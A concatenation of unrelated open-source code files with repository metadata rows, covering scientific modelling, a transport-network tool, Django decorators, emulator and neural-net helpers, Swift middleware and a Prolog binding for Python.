self.out_dead_foragers.sum()])))
self.out_max_chemical_conc_pollen = self.out_max_chemical_conc_pollen.append(pd.Series(self.out_chemical_conc_pollen.max()))
self.out_max_chemical_conc_nectar = self.out_max_chemical_conc_nectar.append(pd.Series(self.out_chemical_conc_nectar.max()))
def fill_sessionid(self, sessionid):
self.out_api_sessionid = self.out_api_sessionid.append(pd.Series(sessionid))
def format_varroapop_payload(self):
input_dict = self.pd_obj.to_dict('records')[0]
weather_loc = input_dict.pop('weather_location')
print('Weather location: '+ weather_loc )
input_dict = self.collapse_dates(input_dict)
input_dict = self.rename_inputs(input_dict)
input_dict = self.remove_unused_inputs(input_dict)
data = json.dumps({'parameters':input_dict, 'weather_file':weather_loc})
return data
def collapse_dates(self, input_dict):
sim_start_keys = ['SimStart_month', 'SimStart_day', 'SimStart_year']
input_dict['SimStart'] = "/".join([str(int(input_dict.get(key))) for key in sim_start_keys])
sim_end_keys = ['SimEnd_month', 'SimEnd_day', 'SimEnd_year']
input_dict['SimEnd'] = "/".join([str(int(input_dict.get(key))) for key in sim_end_keys])
requeen_date_keys = ['RQReQueenDate_month', 'RQReQueenDate_day', 'RQReQueenDate_year']
input_dict['RQReQueenDate'] = "/".join([str(int(input_dict.get(key))) for key in requeen_date_keys])
imm_start_keys = ['ImmStart_month', 'ImmStart_day', 'ImmStart_year']
input_dict['ImmStart'] = "/".join([str(int(input_dict.get(key))) for key in imm_start_keys])
imm_end_keys = ['ImmEnd_month', 'ImmEnd_day', 'ImmEnd_year']
input_dict['ImmEnd'] = "/".join([str(int(input_dict.get(key))) for key in imm_end_keys])
vt_treatment_start_keys = ['VTTreatmentStart_month', 'VTTreatmentStart_day', 'VTTreatmentStart_year']
input_dict['VTTreatmentStart'] = "/".join([str(int(input_dict.get(key))) for key in vt_treatment_start_keys])
foliar_app_date_keys = ['FoliarAppDate_month', 'FoliarAppDate_day', 'FoliarAppDate_year']
input_dict['FoliarAppDate'] = "/".join([str(int(input_dict.get(key))) for key in foliar_app_date_keys])
foliar_forage_begin_keys = ['FoliarForageBegin_month', 'FoliarForageBegin_day', 'FoliarForageBegin_year']
input_dict['FoliarForageBegin'] = "/".join([str(int(input_dict.get(key))) for key in foliar_forage_begin_keys])
foliar_forage_end_keys = ['FoliarForageEnd_month', 'FoliarForageEnd_day', 'FoliarForageEnd_year']
input_dict['FoliarForageEnd'] = "/".join([str(int(input_dict.get(key))) for key in foliar_forage_end_keys])
soil_forage_begin_keys = ['SoilForageBegin_month', 'SoilForageBegin_day', 'SoilForageBegin_year']
input_dict['SoilForageBegin'] = "/".join([str(int(input_dict.get(key))) for key in soil_forage_begin_keys])
soil_forage_end_keys = ['SoilForageEnd_month', 'SoilForageEnd_day', 'SoilForageEnd_year']
input_dict['SoilForageEnd'] = "/".join([str(int(input_dict.get(key))) for key in soil_forage_end_keys])
seed_forage_begin_keys = ['SeedForageBegin_month', 'SeedForageBegin_day', 'SeedForageBegin_year']
input_dict['SeedForageBegin'] = "/".join([str(int(input_dict.get(key))) for key in seed_forage_begin_keys])
seed_forage_end_keys = ['SeedForageEnd_month', 'SeedForageEnd_day', 'SeedForageEnd_year']
input_dict['SeedForageEnd'] = "/".join([str(int(input_dict.get(key))) for key in seed_forage_end_keys])
sup_pollen_begin_keys = ['SupPollenBegin_month', 'SupPollenBegin_day', 'SupPollenBegin_year']
input_dict['SupPollenBegin'] = "/".join([str(int(input_dict.get(key))) for key in sup_pollen_begin_keys])
sup_pollen_end_keys = ['SupPollenEnd_month', 'SupPollenEnd_day', 'SupPollenEnd_year']
input_dict['SupPollenEnd'] = "/".join([str(int(input_dict.get(key))) for key in sup_pollen_end_keys])
sup_nectar_begin_keys = ['SupNectarBegin_month', 'SupNectarBegin_day', 'SupNectarBegin_year']
input_dict['SupNectarBegin'] = "/".join([str(int(input_dict.get(key))) for key in sup_nectar_begin_keys])
sup_nectar_end_keys = ['SupNectarEnd_month', 'SupNectarEnd_day', 'SupNectarEnd_year']
input_dict['SupNectarEnd'] = "/".join([str(int(input_dict.get(key))) for key in sup_nectar_end_keys])
inputs_to_remove = sum([sim_start_keys,sim_end_keys,requeen_date_keys,imm_start_keys,
imm_end_keys,vt_treatment_start_keys,foliar_app_date_keys,
foliar_forage_begin_keys, foliar_forage_end_keys,soil_forage_begin_keys,
soil_forage_end_keys, seed_forage_begin_keys, seed_forage_end_keys,
sup_pollen_begin_keys, sup_pollen_end_keys, sup_nectar_begin_keys, sup_nectar_end_keys], [])
[input_dict.pop(k, None) for k in inputs_to_remove]
return input_dict
def rename_inputs(self, input_dict):
input_dict['EAppRate'] = input_dict.pop('ar_lb')
input_dict['AIKOW'] = math.exp(input_dict.pop('l_kow'))
input_dict['AIKOC'] = input_dict.pop('k_oc')
return input_dict
def remove_unused_inputs(self, input_dict):
keys = list(input_dict.keys())
to_remove = [i for i in keys if i[0].islower()]
for k in to_remove:
input_dict.pop(k, None)
return input_dict
def get_input_file(self, api_sessionid):
file_endpoint = (rest_url_varroapop + '/ocpu/tmp/' + api_sessionid + '/files/')
return requests.get(file_endpoint+'vp_input.txt')
def get_log_file(self, api_sessionid):
file_endpoint = (rest_url_varroapop + '/ocpu/tmp/' + api_sessionid + '/files/')
return requests.get(file_endpoint+'vp_log.txt')
def get_results_file(self, api_sessionid):
file_endpoint = (rest_url_varroapop + '/ocpu/tmp/' + api_sessionid + '/files/')
return requests.get(file_endpoint+'vp_results.txt')
| unlicense | -3,814,458,858,010,616,000 | 65.821839 | 133 | 0.649609 | false |
TravelModellingGroup/TMGToolbox | TMGToolbox/src/network_editing/NCS11/conversion/convert_VDFs.py | 1 | 8469 | '''
Copyright 2014 Travel Modelling Group, Department of Civil Engineering, University of Toronto
This file is part of the TMG Toolbox.
The TMG Toolbox is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The TMG Toolbox is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with the TMG Toolbox. If not, see <http://www.gnu.org/licenses/>.
'''
#---METADATA---------------------
'''
Convert VDFs
Authors: Michael Hain
Latest revision by: Peter Kucirek
Converts VDF indices from DMG2001 to NCS11
'''
#---VERSION HISTORY
'''
0.1.0 Created by Michael Hain
0.2.0 Updated by Peter Kucirek
'''
import inro.modeller as _m
import traceback as _traceback
from contextlib import contextmanager
from contextlib import nested
_util = _m.Modeller().module('tmg.common.utilities')
_tmgTPB = _m.Modeller().module('tmg.common.TMG_tool_page_builder')
##########################################################################################################
class ConvertVDFs(_m.Tool()):
version = '0.2.0'
tool_run_msg = ""
#---Special instance types
scenario = _m.Attribute(_m.InstanceType) #
makeChangesPermanent = _m.Attribute(bool) #
def __init__(self):
self.networkCalculator = _m.Modeller().tool("inro.emme.network_calculation.network_calculator")
def page(self):
pb = _m.ToolPageBuilder(self, title="Convert VDFs v%s" %self.version,
description="Converts link classification types (stored as VDF ids) from \
DMG2001 to NCS11.",
branding_text="- TMG Toolbox")
if self.tool_run_msg != "": # to display messages in the page
pb.tool_run_status(self.tool_run_msg_status)
pb.add_select_scenario(tool_attribute_name="scenario",
title="Select a scenario",
allow_none=False)
pb.add_checkbox(tool_attribute_name="makeChangesPermanent",
title="Make changes permanent?",
note="If unchecked, new VDF values will be stored in link extra attribute '@vdf'.")
return pb.render()
##########################################################################################################
def run(self):
self.tool_run_msg = ""
if self.makeChangesPermanent is None: # Fix the checkbox problem
self.makeChangesPermanent = False;
try:
self._execute()
except Exception as e:
self.tool_run_msg = _m.PageBuilder.format_exception(
e, _traceback.format_exc())
raise
self.tool_run_msg = _m.PageBuilder.format_info("Tool complete.")
##########################################################################################################
def _execute(self):
with _m.logbook_trace(name="Convert Link VDFs v%s" %self.version,
attributes=self._getAtts()):
with self._vdfAttributeMANAGER() as self.attr:
with _m.logbook_trace("Calculating new VDFs into attribute %s" %self.attr.id):
self._assignVDFToLinkSubSet(11, "vdf=11,12") # Urban freeways
self._assignVDFToLinkSubSet(12, "vdf=13,14") # Freeways
self._assignVDFToLinkSubSet(13, "vdf=21,24") # Freeway ramps
self._assignVDFToLinkSubSet(14, "vdf=15") # Tolled freeways
self._assignVDFToLinkSubSet(15, "vdf=25") # Tolled freeway ramps
self._assignVDFToLinkSubSet(16, "vdf=99 and not length=0 and ul2=100,9999") # Freeways HOV lanes
self._assignVDFToLinkSubSet(17, "vdf=99 and length=0,0.1 and ul2=100,9999") # Freeway HOV ramps
self._assignVDFToLinkSubSet(20, "vdf=30,39 and lanes=1 and ul3=600,9999") # Two-lane rural roads
self._assignVDFToLinkSubSet(21, "vdf=30,39 and lanes=2,99 and ul3=600,9999") # Multi-lane rural roads
self._assignVDFToLinkSubSet(22, "vdf=30,39 and ul3=0,599")
self._assignVDFToLinkSubSet(22, "type=217,219 or type=224 or type=325 or type=537 or type=700,999 and vdf=40,49")
self._assignVDFToLinkSubSet(22, "type=217,219 or type=224 or type=325 or type=537 or type=700,999 and vdf=60,69")
self._assignVDFToLinkSubSet(30, "vdf=40,49 and %s=0" %self.attr.id) # Assign only to links which have not already been assigned.
self._assignVDFToLinkSubSet(30, "vdf=30,39 and type=0,112")
self._assignVDFToLinkSubSet(40, "vdf=50,59 and ul3=700,9999")
self._assignVDFToLinkSubSet(41, "vdf=99 and ul2=0,99")
self._assignVDFToLinkSubSet(42, "vdf=50,59 and ul3=0,699")
self._assignVDFToLinkSubSet(50, "vdf=60,69 and %s=0 and lanes=2,99 and ul3=401,9999" %self.attr.id)
self._assignVDFToLinkSubSet(51, "lanes=1 or ul3=0,400 and vdf=60,69 and %s=0" %self.attr.id)
self._assignVDFToLinkSubSet(51, "type=538 and vdf=64")
self._assignVDFToLinkSubSet(90, "vdf=90") #Centroid connectors
if self.makeChangesPermanent:
with _m.logbook_trace("Copying new VDF values into network"):
self._copyAttributeToVDF()
##########################################################################################################
#----CONTEXT MANAGERS---------------------------------------------------------------------------------
'''
Context managers for temporary database modifications.
'''
@contextmanager
def _vdfAttributeMANAGER(self):
#Code here is executed upon entry
att = None
att = self.scenario.extra_attribute("@vdf")
if att is None:
att = self.scenario.create_extra_attribute('LINK', '@vdf', default_value=0)
_m.logbook_write("Created temporary link '%s' attribute to store new VDFs." %att.id)
else:
att.initialize()
_m.logbook_write("Initialized attribute '%s'." %att.id)
try:
yield att
finally:
# Code here is executed in all cases.
if self.makeChangesPermanent:
i = att.id
self.scenario.delete_extra_attribute(att)
_m.logbook_write("Deleted temporary link attribute '%s'" %i)
else:
_m.logbook_write("Temporary link attribute '%s' made permanent." %att.id)
#----SUB FUNCTIONS---------------------------------------------------------------------------------
def _getAtts(self):
atts = {
"Scenario" : str(self.scenario.id),
"self": self.__MODELLER_NAMESPACE__}
return atts
def _assignVDFToLinkSubSet(self, vdf, filterExpression):
spec = {
"result": self.attr.id,
"expression": str(vdf),
"selections": {"link": filterExpression},
"type": "NETWORK_CALCULATION"
}
self.networkCalculator(spec, scenario=self.scenario)
def _copyAttributeToVDF(self):
spec = {
"result": "vdf",
"expression": self.attr.id,
"selections": {"link": "all"},
"type": "NETWORK_CALCULATION"
}
self.networkCalculator(spec, scenario=self.scenario)
@_m.method(return_type=unicode)
def tool_run_msg_status(self):
return self.tool_run_msg
| gpl-3.0 | -17,125,685,268,828,372 | 41.139303 | 148 | 0.526036 | false |
ioreshnikov/wells | wells/time_dependent.py | 1 | 1615 | import scipy as s
import scipy.fftpack as fft
import scipy.integrate
import sys
def integrate(t, x, input, potential, delta, pump, loss, absorber):
nt = len(t)
nx = len(x)
dx = x[1] - x[0]
k = 2*s.pi * fft.fftfreq(nx, dx)
d = - delta - 1/2 * k**2
spectrum = fft.fft(input)
spectrum_ = spectrum
def rhs(t, spectrum_):
exp_ = s.exp(1j * d * t)
spectrum = exp_ * spectrum_
state = fft.ifft(spectrum)
nonlinearity = abs(state)**2 * state
nonlinearity += - potential * state
nonlinearity += 1j * loss * state
nonlinearity += 1j * absorber * (abs(state) - abs(input)) * state
nonlinearity += pump
return 1j * 1/exp_ * fft.fft(nonlinearity)
solver = scipy.integrate.ode(rhs)
solver.set_integrator("zvode",
rtol=1E-6,
atol=1E-10,
nsteps=2048)
solver.set_initial_value(spectrum_, 0)
spectra_ = s.zeros((nt, nx), dtype=complex)
spectra_[0, :] = spectrum_
# Preallocate return matrices in advance.
spectra = s.zeros((nt, nx), dtype=complex)
states = s.zeros((nt, nx), dtype=complex)
for i in range(1, nt):
sys.stderr.write("\rIntegrating: %-3.3f%%" % (100 * i/nt))
spectra_[i, :] = solver.integrate(t[i])
sys.stderr.write("\r")
for i in range(0, nt):
spectra[i, :] = s.exp(1j * d * t[i]) * spectra_[i, :]
states[i, :] = fft.ifft(spectra[i, :])
spectra[i, :] = 1/nt * fft.fftshift(spectra[i, :])
k = fft.fftshift(k)
return k, states, spectra
| mit | 2,178,837,503,368,915,500 | 28.907407 | 73 | 0.544892 | false |
HenriqueLR/payments | app/main/decorators.py | 1 | 1514 | #encoding: utf-8
from django.core.exceptions import PermissionDenied
from django.contrib import messages
from django.shortcuts import redirect
from django.contrib.auth import get_user_model
from wallet.models import Debit, Deposit, Note
from main.utils import get_list_permissions
User = get_user_model()
def ajax_required(view):
def wrap(request, *args, **kwargs):
if not request.is_ajax():
messages.error(request, 'Impossivel acessar o link, entre em contato com administrador do sistema')
return redirect('accounts:logout')
return view(request, *args, **kwargs)
wrap.__doc__ = view.__doc__
wrap.__name__ = view.__name__
return wrap
def permissions_denied(view):
def wrap(request, *args, **kwargs):
list_model = [Debit, Deposit, Note]
for model in list_model:
permissions = get_list_permissions(model, permission_list=['all'])
if not request.user.has_perms(permissions):
messages.error(request, 'Não possui as permissões necessárias, contate o administrador do sistema')
return redirect('accounts:logout')
return view(request, *args, **kwargs)
wrap.__doc__ = view.__doc__
wrap.__name__ = view.__name__
return wrap
def verify_payment(view):
def wrap(request, *args, **kwargs):
if not request.user.account.status_payment:
messages.error(request, 'Estamos aguardando o pagamento para liberação do sistema')
return redirect('accounts:logout')
return view(request, *args, **kwargs)
wrap.__doc__ = view.__doc__
wrap.__name__ = view.__name__
return wrap | mit | 5,929,164,697,228,002,000 | 31.12766 | 103 | 0.721007 | false |
jmatthed/avatar-samples | qemu_uboot/test_system.py | 1 | 4490 | from avatar.system import System
import logging
from avatar.emulators.s2e import init_s2e_emulator
import threading
import subprocess
from avatar.targets.gdbserver_target import init_gdbserver_target
import os
import time
log = logging.getLogger(__name__)
configuration = {
"output_directory": "/tmp/1",
"configuration_directory": os.getcwd(),
"s2e": {
"klee": {
},
"plugins": {
"BaseInstructions": {},
"Initializer": {},
"MemoryInterceptor": "",
"RemoteMemory": {
"verbose": True,
"listen_address": "localhost:3333",
"ranges": {
"sram_code": {
"address": 32768,
"size": 1048575,
"access": ["read", "write", "execute", "io", "memory", "concrete_value", "concrete_address"]
}
}
},
}
},
"qemu_configuration": {
"halt_processor_on_startup": True,
"trace_instructions": True,
"trace_microops": False,
"gdb": "tcp::1235,server,nowait",
"append": ["-serial", "tcp::8888,server,nowait"]
},
"machine_configuration": {
"architecture": "arm",
"cpu_model": "arm926",
"entry_address": 0x1000000,
"memory_map": [
{
"size": 0x1000,
"name": "interrupts",
"map": [
{"address": 0,
"type": "code",
"permissions": "rwx"}
]
},
{
"size": 0x19000,
"name": "text_data_bss",
"file": "u-boot.bin",
"map": [{
"address": 0x1000000,
"type": "code",
"permissions": "rwx"}]
}
],
"devices": [
{
"type": "serial",
"name": "uart16550",
"qemu_name": "sysbus-serial",
"address": 0x101f1000,
"bus": "sysbus"
}
]
},
"avatar_configuration": {
"target_gdb_address": "tcp:localhost:1234"
}
}
class TargetLauncher(object):
def __init__(self, cmd):
self._cmd = cmd
self._process = None
self._thread = threading.Thread(target = self.run)
self._thread.start()
def stop(self):
if self._process:
self._process.kill()
def run(self):
self._process = subprocess.call(self._cmd)
class DumbTarget():
def start(self):
pass
def init_emulator(system):
log.info("init_emulator called")
def init_target(system):
system.set_target(DumbTarget())
log.info("init_target called")
class RWMonitor():
def emulator_pre_read_request(self, params):
log.info("Emulator is requesting read 0x%08x[%d]", params["address"], params["size"])
def emulator_post_read_request(self, params):
log.info("Executed read 0x%08x[%d] = 0x%x", params["address"], params["size"], params["value"])
def emulator_pre_write_request(self, params):
log.info("Emulator is requesting write 0x%08x[%d] = 0x%x", params["address"], params["size"], params["value"])
pass
def emulator_post_write_request(self, params):
log.info("Executed write 0x%08x[%d] = 0x%x", params["address"], params["size"], params["value"])
pass
def stop(self):
pass
ava = System(configuration, init_s2e_emulator, init_gdbserver_target)
ava.init()
target_runner = TargetLauncher(["qemu-system-arm",
"-M", "versatilepb",
"-m", "20M",
"-serial", "udp:127.0.0.1:2000",
"-kernel", "u-boot",
"-gdb", "tcp:127.0.0.1:1234",
"-S"])
ava.add_monitor(RWMonitor())
time.sleep(3)
ava.start()
ava.get_emulator().cont()
| apache-2.0 | 1,403,994,548,638,476,000 | 31.071429 | 118 | 0.436526 | false |
maxim-borisyak/craynn | craynn/layers/conv_ops.py | 1 | 2783 | from lasagne import *
__all__ = [
'conv', 'conv1x1',
'deconv', 'deconv1x1',
'upscale',
'max_pool', 'mean_pool', 'floating_maxpool', 'floating_meanpool',
'global_pool',
'upconv', 'downconv'
]
get_conv_nonlinearity = lambda f=None: nonlinearities.LeakyRectify(0.05) if f is None else f
get_companion_nonlinearity = lambda num_units=None, f=None: \
nonlinearities.sigmoid if num_units is None or num_units == 1 else nonlinearities.softmax
conv = lambda num_filters, f=None, filter_size=(3, 3): lambda incoming: layers.Conv2DLayer(
incoming,
num_filters=num_filters, filter_size=filter_size,
nonlinearity=get_conv_nonlinearity(f),
pad='valid'
)
conv1x1 = lambda num_filters, f=None: lambda incoming: layers.Conv2DLayer(
incoming,
num_filters=num_filters, filter_size=(1, 1),
nonlinearity=get_conv_nonlinearity(f),
pad='valid'
)
deconv = lambda num_filters, f=None, filter_size=(3, 3): lambda incoming: layers.TransposedConv2DLayer(
incoming,
num_filters=num_filters, filter_size=filter_size,
nonlinearity=get_conv_nonlinearity(f),
crop='valid'
)
deconv1x1 = lambda num_filters, f=None: lambda incoming: layers.TransposedConv2DLayer(
incoming,
num_filters=num_filters, filter_size=(1, 1),
nonlinearity=get_conv_nonlinearity(f),
crop='valid'
)
max_pool = lambda pool_size=(2, 2): lambda incoming: layers.MaxPool2DLayer(incoming, pool_size=pool_size)
floating_maxpool = lambda pool_size=(2, 2): lambda incoming: layers.MaxPool2DLayer(
incoming,
pool_size=(pool_size[0] // 2 * 3, pool_size[0] // 2 * 3),
stride=pool_size,
pad=(pool_size[0] // 2, pool_size[1] // 2)
)
upscale = lambda scale_factor=(2, 2): lambda incoming: layers.Upscale2DLayer(incoming, scale_factor=scale_factor)
downconv = lambda scale_factor=(2, 2), channel_factor=1: lambda incoming: \
layers.Conv2DLayer(
incoming,
num_filters=layers.get_output_shape(incoming)[1] // channel_factor,
filter_size=scale_factor,
stride=scale_factor,
nonlinearity=nonlinearities.linear
)
upconv = lambda scale_factor=(2, 2), channel_factor=1: lambda incoming: \
layers.TransposedConv2DLayer(
incoming,
num_filters=layers.get_output_shape(incoming)[1] // channel_factor,
filter_size=scale_factor,
stride=scale_factor,
nonlinearity=nonlinearities.linear
)
mean_pool = lambda pool_size=(2, 2): lambda incoming: layers.Pool2DLayer(incoming, pool_size=pool_size, mode='average_inc_pad')
floating_meanpool = lambda pool_size=(2, 2): lambda incoming: layers.Pool2DLayer(
incoming,
pool_size=(pool_size[0] // 2 * 3, pool_size[0] // 2 * 3),
stride=pool_size,
pad=(pool_size[0] // 2, pool_size[1] // 2),
mode='average_inc_pad'
)
global_pool = lambda f=None: lambda incoming: layers.GlobalPoolLayer(incoming, pool_function=f) | mit | -6,815,556,254,835,466,000 | 32.542169 | 127 | 0.71254 | false |
vindeka/gateswift | gateswift/middleware.py | 1 | 5131 | # Copyright (c) 2013 Vindeka, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import kombu
from swift.common.utils import get_logger
from swift.common.swob import Request, HttpOk, HTTPBadRequest, HttpNotFound
class GateMiddleware(object):
"""
Gate middleware for swift communication.
Add to your pipeline in proxy-server.conf, such as::
[pipeline:main]
pipeline = catch_errors cache tempauth gatemiddleware proxy-server
And add a keystone2 filter section, such as::
[filter:gatemiddleware]
use = egg:gateswift#gatemiddleware
amqp_connection = amqp://guest:guest@localhost/
:param app: The next WSGI app in the pipeline
:param conf: The dict of configuration values
"""
def __init__(self, app, conf):
self.app = app
self.conf = conf
self.logger = get_logger(conf, log_route='gatemiddleware')
self.conn_str = conf.get('amqp_connection', 'amqp://localhost/')
self.exc_str = conf.get('amqp_exchange', 'gate')
self.exc_type = conf.get('amqp_exchange_type', 'direct')
self.exc_durable = bool(conf.get('amqp_exchange_durable', 'True'))
def __call__(self, env, start_response):
self.logger.debug('Initialising gate middleware')
req = Request(env)
try:
version, account = req.split_path(1, 3, True)
except ValueError:
return HttpNotFound(request=req)
if account is 'gate':
# Handles direct calls to gate
return HttpOk
if 'X-Gate-Verify' in env:
verify = env['X-Gate-Verify']
self.logger.debug('Verification request: %s algorithms: %s' % (req.path, verify))
try:
version, account, container, obj = req.split_path(4, 4, True)
except ValueError:
return HTTPBadRequest(request=req)
algorithms = verify.split(',')
for algo in algorithms:
metakey = 'X-Object-Meta-Gate-%s' % algo.upper()
if metakey not in env:
self.logger.debug('Invalid verification request, object missing: %s' % (metakey))
return HTTPBadRequest(request=req)
if publish_verify(req.path, algorithms):
for algo in algorithms:
statuskey = 'X-Object-Meta-Gate-Verify-%s-Status' % algo.upper()
env[statuskey] = 'Queued'
env['X-Object-Meta-Gate-Verify'] = verify
if 'X-Gate-Process' in env:
module = env['X-Gate-Process']
self.logger.debug('Process request: %s module: %s' % (req.path, module))
try:
version, case, container, obj = req.split_path(4, 4, True)
except ValueError:
return HTTPBadRequest(request=req)
if publish_process(req.path, algorithms):
for algo in algorithms:
env['X-Object-Meta-Gate-Process'] = module
env['X-Object-Meta-Gate-Process-Status'] = 'Queued'
# TODO: Get reponse to see if a fake object
reponse = self.app(env, start_response)
return reponse
def publish_verify(self, path, algorithms):
""" Publish a verify request on the queue to gate engine """
exchange = kombu.Exchange(self.exc_str, exc_type, durable=exc_durable)
queue = kombu.Queue('verify', exchange=exchange, routing_key='verify')
with kombu.Connection(self.conn_str) as connection:
with connection.Producer(serializer='json') as producer:
producer.publish({'path':path, 'algorithms':algorithms},
exchange=exchange, routing_key='verify', declare=[queue])
return True
def publish_process(self, path, module):
""" Publish a process request on the queue to gate engine """
exchange = kombu.Exchange(self.exc_str, exc_type, durable=exc_durable)
queue = kombu.Queue('process', exchange=exchange, routing_key='process')
with kombu.Connection(self.conn_str) as connection:
with connection.Producer(serializer='json') as producer:
producer.publish({'path':path, 'module':module},
exchange=exchange, routing_key='process', declare=[queue])
return True
def filter_factory(global_conf, **local_conf):
"""Returns a WSGI filter app for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return GateMiddleware(app, conf)
return auth_filter
| apache-2.0 | 8,751,585,938,849,223,000 | 38.469231 | 101 | 0.618008 | false |
EdTsft/swilite | swilite/prolog.py | 1 | 50967 | """An object-oriented interface to Prolog."""
from collections import namedtuple
from ctypes import (
POINTER,
byref,
c_char,
c_double,
c_int,
c_int64,
c_size_t,
c_void_p,
)
from swilite.core import (
BUF_DISCARDABLE,
CVT_WRITEQ,
PL_ATOM,
PL_BLOB,
PL_DICT,
PL_FLOAT,
PL_INTEGER,
PL_LIST_PAIR,
PL_NIL,
PL_Q_CATCH_EXCEPTION,
PL_Q_NODEBUG,
PL_STRING,
PL_TERM,
PL_VARIABLE,
PL_atom_chars,
PL_call,
PL_call_predicate,
PL_chars_to_term,
PL_close_foreign_frame,
PL_close_query,
PL_cons_functor,
PL_cons_functor_v,
PL_cons_list,
PL_context,
PL_copy_term_ref,
PL_discard_foreign_frame,
PL_erase,
PL_exception,
PL_functor_arity,
PL_functor_name,
PL_get_arg,
PL_get_atom,
PL_get_atom_nchars,
PL_get_bool,
PL_get_compound_name_arity,
PL_get_float,
PL_get_functor,
PL_get_head,
PL_get_int64,
PL_get_list,
PL_get_module,
PL_get_name_arity,
PL_get_nchars,
PL_get_nil,
PL_get_pointer,
PL_get_string_chars,
PL_get_tail,
PL_is_acyclic,
PL_is_atom,
PL_is_atomic,
PL_is_callable,
PL_is_compound,
PL_is_float,
PL_is_functor,
PL_is_ground,
PL_is_integer,
PL_is_list,
PL_is_number,
PL_is_pair,
PL_is_string,
PL_is_variable,
PL_module_name,
PL_new_atom,
PL_new_functor,
PL_new_module,
PL_new_term_ref,
PL_new_term_refs,
PL_next_solution,
PL_open_foreign_frame,
PL_open_query,
PL_pred,
PL_predicate,
PL_predicate_info,
PL_put_atom,
PL_put_atom_nchars,
PL_put_bool,
PL_put_float,
PL_put_functor,
PL_put_int64,
PL_put_list,
PL_put_list_nchars,
PL_put_nil,
PL_put_pointer,
PL_put_string_nchars,
PL_put_term,
PL_put_variable,
PL_record,
PL_recorded,
PL_register_atom,
PL_rewind_foreign_frame,
PL_term_type,
PL_unify,
PL_unify_arg,
PL_unify_atom,
PL_unify_atom_nchars,
PL_unify_bool,
PL_unify_compound,
PL_unify_float,
PL_unify_functor,
PL_unify_int64,
PL_unify_list,
PL_unify_list_nchars,
PL_unify_nil,
PL_unify_pointer,
PL_unify_string_nchars,
PL_unregister_atom,
REP_UTF8,
atom_t,
functor_t,
module_t,
state as prolog_state,
)
_term_type_code_name = {
PL_VARIABLE: 'variable',
PL_ATOM: 'atom',
PL_INTEGER: 'integer',
PL_FLOAT: 'float',
PL_STRING: 'string',
PL_TERM: 'compound',
PL_NIL: 'nil',
PL_BLOB: 'blob',
PL_LIST_PAIR: 'list-pair',
PL_DICT: 'dict',
}
__all__ = [
'Atom',
'Frame',
'Functor',
'Module',
'Predicate',
'PrologCallFailed',
'PrologException',
'PrologMemoryError',
'Query',
'Term',
'TermList',
'TermRecord',
]
class PrologException(Exception):
"""An exception raised within the Prolog system."""
def __init__(self, exception_term):
super().__init__()
self.exception_term = exception_term
def __str__(self):
return "Prolog Exception:\n{!s}".format(self.exception_term)
def __repr__(self):
return 'PrologException({!r})'.format(self.exception_term)
class PrologCallFailed(RuntimeError):
"""A call failed."""
def __init__(self, msg):
super().__init__()
self.msg = msg
def __str__(self):
return str(self.msg)
class PrologMemoryError(Exception):
"""Prolog stack is out of memory."""
pass
class HandleWrapper(object):
"""Class wrapping a handle."""
def __init__(self, handle):
self._handle = handle
@classmethod
def _from_handle(cls, handle):
"""Initialize from an existing handle."""
if handle is None:
# When the handle truly is 0, ctypes interprets the value as None.
# Undo the mistake here.
# Unfortunately, this means we can't warn about None being passed
# when it's an error.
handle = 0
if not isinstance(handle, int):
raise ValueError('Handle must be an int, not {}'.format(
type(handle).__name__))
new_obj = cls.__new__(cls)
HandleWrapper.__init__(new_obj, handle=handle)
return new_obj
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return self._handle == other._handle
def __ne__(self, other):
return not self == other
class TemporaryHandleMixIn(object):
"""Mixin for `HandleWrapper` where the handle can be invalidated."""
_valid = True
def __init__(self):
super().__init__()
def _get_handle(self):
if self._valid:
return self.__handle
raise AttributeError('handle been invalidated')
def _set_handle(self, handle):
self.__handle = handle
_handle = property(fget=_get_handle, fset=_set_handle)
def _invalidate(self):
"""Invalidate the handle."""
self._valid = False
class ConstantHandleToConstantMixIn(object):
"""`HandleWrapper` mixin where `_handle` is constant and refers to a
constant object.
"""
def __hash__(self):
return hash(self._handle)
def _decode_ptr_len_string(ptr, length, encoding='utf8'):
"""Decode a string from a ctypes pointer and length."""
return ptr[:length.value].decode(encoding)
class Atom(HandleWrapper):
"""Prolog Atom Interface"""
def __init__(self, name):
"""Create a named atom."""
super().__init__(handle=PL_new_atom(name.encode()))
@classmethod
def _from_handle(cls, handle):
"""Create an Atom object from an existing atom handle."""
new_atom = super()._from_handle(handle)
PL_register_atom(new_atom._handle)
return new_atom
def __str__(self):
return self.get_name()
def __repr__(self):
return 'Atom(name={name!r})'.format(name=self.get_name())
def __del__(self):
if prolog_state.is_available:
PL_unregister_atom(self._handle)
def __copy__(self):
"""A new `Atom` object pointing to the same atom."""
return self._from_handle(self._handle)
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
# Atoms can have different handles but the same name.
return self.get_name() == other.get_name()
def __hash__(self):
return hash(self.get_name())
def get_name(self):
"""The atom's name as a string."""
return PL_atom_chars(self._handle).decode()
class Functor(HandleWrapper, ConstantHandleToConstantMixIn):
"""Prolog Functor Interface"""
def __init__(self, name, arity):
"""Create a functor.
Args:
name (Atom): Name of the functor.
Either Atom object or string, the former is more efficient.
arity (int): Arity of the functor.
"""
try:
name_handle = name._handle
except AttributeError:
name_handle = Atom(name=name)._handle
super().__init__(handle=PL_new_functor(name_handle, arity))
def __str__(self):
return "{name}/{arity}".format(name=self.get_name(),
arity=self.get_arity())
def __repr__(self):
return "Functor(name={name!r}, arity={arity!r})".format(
name=self.get_name(), arity=self.get_arity())
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return (self.get_name() == other.get_name() and
self.get_arity() == other.get_arity())
def __hash__(self):
